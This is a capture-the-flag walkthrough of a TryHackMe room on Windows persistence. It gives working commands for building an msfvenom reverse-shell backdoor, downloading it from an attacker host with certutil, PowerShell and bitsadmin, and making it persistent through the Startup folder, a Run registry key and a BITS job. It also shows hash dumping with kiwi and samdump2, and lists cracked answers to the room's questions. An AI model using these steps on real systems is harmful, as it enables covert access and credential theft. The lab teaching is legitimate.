Persistence TryHackme Writeup

By Shamsher khan This is a Writeup of Tryhackme room “Persistence”

Image for post
Image for post
https://tryhackme.com/room/persistence

Room link: https://tryhackme.com/room/persistence
Note: This room is for Premium Members Only. who purchased THM premium membership.

What is persistence?

Persistence is a post-exploitation activity used by penetration testers in order to keep access to a system throughout the whole assessment and not to have to re-exploit the target even if the system restarts.

It can be considered that there are two types of persistence. These two types are:

  • Low privileged persistence
  • Privileged user persistence

Low privileged user persistence

Low privileged persistence means that the penetration tester gained and uses persistence techniques to keep his access to the target system under a normal user profile/account (a domain user with no administrative rights).

Privileged user persistence

After gaining access to a system, sometimes (because it would be inaccurate to say always), a penetration tester will do privilege escalation in order to gain access to the highest privilege user that can be on a Windows machine (nt authority\system).

After privilege escalation, he will use persistence in order to keep the access he gained.

Keeping persistence

Ways of keeping persistence:

  • Startup folder persistence
  • Editing registry keys
  • Using scheduled tasks
  • Using BITS
  • Creating a backdoored service
  • Creating another user
  • Backdooring RDP

Task 2. Low privilege user persistence

Start by deploying the machine and connect to it through RDP using the following credentials:

tryhackme:tryhackme123

I used Remmina to RDP into the machine. If you don’t have it installed, you can install it using the following command:sudo apt-get install remmina

Image for post
Image for post

Create a Metasploit backdoor using msfvenom. To create the backdoor use the below syntax:

msfvenom -p windows/meterpreter/reverse_tcp <LHOST> <LPORT> -f exe > backdoor.exe where LHOST is your IP and LPORT is he port Metasploit will listen for connections.

Image for post
Image for post

Create a Metasploit listener.

Image for post
Image for post

Using python create a webserver (python -m SimpleHTTPServer 80) and deliver (download) the backdoor to the target system you previously logged in.

File Transfer method-1

But first, go to Internet Explorer settings and choose “Internet Options”.

Image for post
Image for post

Click on the “Security” tab, select “Trusted Sites” and then click on the “Sites” button. Fill the “Add this website to the zone” field with your IP address and click the “Add” button.

Image for post
Image for post

After adding your IP to the trusted websites you can close that tab, and then click OK.

Now, you should be able to download your backdoor.

Image for post
Image for post

By pressing on the “Run” button the backdoor will be executed by the system and a connection to Metasploit will be created.

File Transfer method-2

Another delivery method would be using Powershell. Open a Powershell window and download the backdoor using the following command:

Invoke-WebRequest http://10.x.x.x/backdoor.exe -Outfile backdoor.exe
Image for post
Image for post

To execute the backdoor type .\backdoor.exe

File Transfer method-3

You can use certutil to download the backdoor. You can use certutil from both windows command line and Powershell commandline. The command to download the file is:

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe
Image for post
Image for post

Execution of the backdoor is done in the same way as the one at method II, by typing .\backdoor.exe

Image for post
Image for post

This is a low privileged user account with no administrative privileges.

Startup folder persistence

Supposing we do not consider privilege escalation is necessary and we just want to have access to the system in case the user restarts the machine the simplest method would be moving the backdoor to the startup folder.

The path of the startup folder is: C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. %username% in our case is tryhackme. Browse to that path and upload the binary you generated with msfvenom.

Image for post
Image for post

Since the binary is in the startup folder every time a user restarts its computer and logs in the backdoor will be executed and Metasploit will receive the connection.

Editing registries

Depending on the registries a low privileged user might be able to edit them. With this in mind, an attacker could edit the registries to achieve persistence.

An example of an editable registry is: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

First, let’s move the backdoor to the AppData folder. You can either move it from the Startup folder or upload it again to the AppData folder.

Image for post
Image for post

Drop into a shell and use the reg add function to create a registry that will run our backdoor as follows:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"
Image for post
Image for post

Notice that the operation was completed successfully.

BITS Jobs

BITS (Background Intelligent Transfer Service) is used for file transfer between machines (downloading or uploading) using idle network bandwidth.

BITS Jobs are containers that contain files that need to be transferred. However, when creating the job the container is empty and it needs to be populated (specify one or more files to be transferred). It’s also needed to add the source and the destination.

Now that we know what BITS is and what jobs are used for let’s try achieving persistence.

You can view the BITS help menu by typing: bitsadmin in the command line/the shell you spawned.

Let’s create the job:

bitsadmin /create backdoor
Image for post
Image for post

Add the file for the job that will be transferred:

bitsadmin /addfile backdoor "http://10.2.12.26/backdoor.exe" "C:\Users\tryhackme\Documents\backdoor.exe"
Image for post
Image for post

Now, let’s make BITS execute our backdoor:

bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"
Image for post
Image for post

NULL is used at the end of the syntax because our backdoor doesn’t have any additional parameters.

Since we want our backdoor to be persistent we’ll set a retry delay for the job.

Image for post
Image for post

Finally, we’ll start/resume the job.

Note: In order to work you have to have a webserver (i used apache) running so BITS can download the backdoor and Metasploit listening for connections.

To execute the job type: bitsadmin /resume. As can be observed in the below image we received the second connection.

Image for post
Image for post

Note: BITS is very unstable and can and might give you just temporary persistence.

Question What kind of persistence can/might BITS give?

Answer: temporary

What is hash dumping?

Hash dumping is the technique used by penetration testers to extract the password hashes off of the target system to either crack them or to try to do lateral movement.

The simplest way to do hash dumping is by using Metasploit’s hashdump/kiwi module:

Image for post
Image for post

The same result can be achieved by saving the SAM and SYSTEM registries, downloading the files and using samdump2.

Let’s save first the registries on the target machine:

Image for post
Image for post

With the registries saved download the files to the attacker machine and use samdump2 to recover the hashes.

Image for post
Image for post

It seems some users do not appear, only their hashes. However, for that issue, you can query for users that are on the system.

You can dump credentials using kiwi, which is the equivalent of mimikatz. To do that you’ll need to load the module: load kiwi.

The command used to dump the SAM database hashes is: lsa_dump_sam

Image for post
Image for post

There are more ways of dumping hashes and multiple tools and scripts that can be used for this purpose.

Note: If planning to use the offline cracking method the passwords are contained in the following wordlist from seclists: 100k-most-used-passwords-NCSC.txt (/usr/share/seclists/Passwords/Common-Credentials). In case you do not have seclists installed you can do it by usingthe following command: sudo apt-get install seclists .

Question .What’s Chris decrypted NTLM?

878d8014606cda29677a44efa1353fc7
Image for post
Image for post
https://crackstation.net/

Answer: secret

Question .What’s Joe decrypted NTLM?

e0b6050c7280bf4a7bee599cf374fd80
Image for post
Image for post

Answer: mypass123

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

Image for post
Image for post

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store